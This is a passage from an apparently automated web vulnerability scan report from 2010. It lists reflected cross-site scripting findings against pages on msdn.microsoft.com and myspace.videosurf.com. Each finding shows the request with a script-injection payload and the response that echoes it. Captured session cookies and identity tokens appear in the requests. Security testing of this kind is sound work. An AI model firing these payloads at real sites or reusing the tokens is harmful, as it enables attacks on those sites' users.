17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:05 GMT
Content-Length: 9184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms951681.aspxaff27"><a>96af2b045ba" />
...[SNIP]...

2.132. http://msdn.microsoft.com/en-us/ms348103.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/ms348103.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f8f"><a>bfa3d2aff44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en-us/ms348103.aspx?b6f8f"><a>bfa3d2aff44=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms348103.aspx?b6f8f"><a>bfa3d2aff44=1" />
...[SNIP]...

2.133. http://myspace.videosurf.com/video/brittany-mae-smith-surveillance-footage-1247969138 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/brittany-mae-smith-surveillance-footage-1247969138

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e44e4"><script>alert(1)</script>9820aeb12bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/brittany-mae-smith-surveillance-footage-1247969138e44e4"><script>alert(1)</script>9820aeb12bd HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=5mtk9d67jhoc39d7magns8hs80; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=35; expires=Sun, 11-Dec-2011 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:01 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:01 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc5e4494c; expires=Sun, 11-Dec-2011 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:01 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:01 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/brittany-mae-smith-surveillance-footage-1247969138e44e4"><script>alert(1)</script>9820aeb12bd"/>
...[SNIP]...

2.134. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3100d"><script>alert(1)</script>0c1559a14fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/e-news-now-oprah-clears-up-lesbian-rumors-12473592563100d"><script>alert(1)</script>0c1559a14fa HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=e61vdkp265q1860rv0jnupnb82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=34; expires=Sun, 11-Dec-2011 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc671d011; expires=Sun, 11-Dec-2011 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:10 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-12473592563100d"><script>alert(1)</script>0c1559a14fa"/>
...[SNIP]...

2.135. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ecd"><script>alert(1)</script>f0a2b614e24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?b2ecd"><script>alert(1)</script>f0a2b614e24=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:01:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=0r9d8nik8dk2ibcl4ftho912o1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=21; expires=Sun, 11-Dec-2011 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc5f72c16; expires=Sun, 11-Dec-2011 18:01:03 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=5409cc42c4b1a771f863f5dbaf7f96ae; expires=Sat, 11-Dec-2010 21:01:03 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?b2ecd"><script>alert(1)</script>f0a2b614e24=1"/>
...[SNIP]...

2.136. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [vlt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256

Issue detail

The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 281c1"><script>alert(1)</script>e2ff8386fd8 was submitted in the vlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?vlt=myspace281c1"><script>alert(1)</script>e2ff8386fd8 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=mlp5e4trd00k5mrg5lj81uda01; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=13; expires=Sun, 11-Dec-2011 18:15:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfad52697; expires=Sun, 11-Dec-2011 18:15:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: vlt_code=655537655c7514a72f0b43b4d509a3c8; expires=Sat, 11-Dec-2010 19:15:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=d713e06b5f7d5cc4d5becbbe13355bd0; expires=Sat, 11-Dec-2010 21:15:09 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 51095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256?vlt=myspace281c1"><script>alert(1)</script>e2ff8386fd8"/>
...[SNIP]...

2.137. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/saved-by-the-belding-1247850355

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b463c"><script>alert(1)</script>bb705bdfbd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/saved-by-the-belding-1247850355b463c"><script>alert(1)</script>bb705bdfbd3 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=d0qqm4ok93e0137t8sjeemai62; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=88; expires=Sun, 11-Dec-2011 18:01:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc655ef1f; expires=Sun, 11-Dec-2011 18:01:09 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:08 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/saved-by-the-belding-1247850355b463c"><script>alert(1)</script>bb705bdfbd3"/>
...[SNIP]...

2.138. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/saved-by-the-belding-1247850355

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b3c"><script>alert(1)</script>6a1ae5d1e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/saved-by-the-belding-1247850355?11b3c"><script>alert(1)</script>6a1ae5d1e6d=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:01:00 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=1209e6dboifnmmai10jpcif075; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=100; expires=Sun, 11-Dec-2011 18:01:00 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:00:59 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:00:59 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc5c98084; expires=Sun, 11-Dec-2011 18:01:00 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:00:59 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=45ee8fd4e266595b3a0122fc0e81506e; expires=Sat, 11-Dec-2010 21:01:00 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/saved-by-the-belding-1247850355?11b3c"><script>alert(1)</script>6a1ae5d1e6d=1"/>
...[SNIP]...

2.139. http://myspace.videosurf.com/video/saved-by-the-belding-1247850355 [vlt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/saved-by-the-belding-1247850355

Issue detail

The value of the vlt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a71b"><script>alert(1)</script>fd17ed3156e was submitted in the vlt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/saved-by-the-belding-1247850355?vlt=myspace8a71b"><script>alert(1)</script>fd17ed3156e HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:15:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=vqjtl07me7vaks54qblma2qrf1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=58; expires=Sun, 11-Dec-2011 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:15:07 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:15:07 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bfac65096; expires=Sun, 11-Dec-2011 18:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: vlt_code=823adae01d6ff1365236edf10d7b3390; expires=Sat, 11-Dec-2010 19:15:08 GMT; path=/; domain=.videosurf.com
Set-Cookie: jack_bauer's_kills=1; path=/; domain=.videosurf.com
Set-Cookie: ATID=deleted; expires=Fri, 11-Dec-2009 18:15:07 GMT; path=/; domain=.videosurf.com
Set-Cookie: ATID=9954151fda41b0ee361042a6a5c5eeba; expires=Sat, 11-Dec-2010 21:15:08 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/saved-by-the-belding-1247850355?vlt=myspace8a71b"><script>alert(1)</script>fd17ed3156e"/>
...[SNIP]...

2.140. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58fbd"><script>alert(1)</script>eb255840b05 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-124799007958fbd"><script>alert(1)</script>eb255840b05 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=32ee104dfis9c9v2otj1agmdq6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=12; expires=Sun, 11-Dec-2011 18:01:12 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc685247e; expires=Sun, 11-Dec-2011 18:01:12 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:11 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-124799007958fbd"><script>alert(1)</script>eb255840b05"/>
...[SNIP]...

2.141. http://myspace.videosurf.com/video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a112e"><script>alert(1)</script>0e0865bbed4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/the-creepy-hand-model-ellen-sirot-with-michaela-watkins-1247990079?a112e"><script>alert(1)</script>0e0865bbed4=1 HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:01:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=6o10tmo9n8lr9p93liv3048p46; path=/
